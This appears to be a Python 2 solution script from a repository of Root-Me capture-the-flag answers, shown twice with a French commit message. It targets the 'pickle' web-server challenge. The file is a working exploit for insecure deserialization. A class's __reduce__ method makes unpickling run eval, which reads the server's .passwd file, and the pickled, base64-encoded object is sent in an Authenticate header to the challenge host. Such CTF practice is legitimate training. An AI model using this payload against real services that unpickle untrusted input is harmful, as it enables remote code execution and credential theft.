Hacks/rootme/challenges/web-serveur/pickle/pickle_hack.py

import socket
import base64
import pickle
 
host = 'challenge02.root-me.org'
port = 60005
 
class Exploit(object):
    def __reduce__(self):
        return (eval, ('eval(file("/challenge/app-script/ch5/.passwd", "r").read())',))
 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
obj = Exploit()
req = '''AUTH admin HTTP/1.0\r\nAuthenticate: %s\r\n\r\n''' % base64.b64encode(pickle.dumps(obj))
sock.send(req)
 
res = sock.recv(4096)
while res:
    print res
    res = sock.recv(4096)
Ajout nouveaux challenges 2023-02-12 22:49:38 +01:00			`import socket`
			`import base64`
			`import pickle`

			`host = 'challenge02.root-me.org'`
			`port = 60005`

			`class Exploit(object):`
			`def __reduce__(self):`
			`return (eval, ('eval(file("/challenge/app-script/ch5/.passwd", "r").read())',))`

			`sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)`
			`sock.connect((host, port))`
			`obj = Exploit()`
			`req = '''AUTH admin HTTP/1.0\r\nAuthenticate: %s\r\n\r\n''' % base64.b64encode(pickle.dumps(obj))`
			`sock.send(req)`

			`res = sock.recv(4096)`
			`while res:`
			`print res`
			`res = sock.recv(4096)`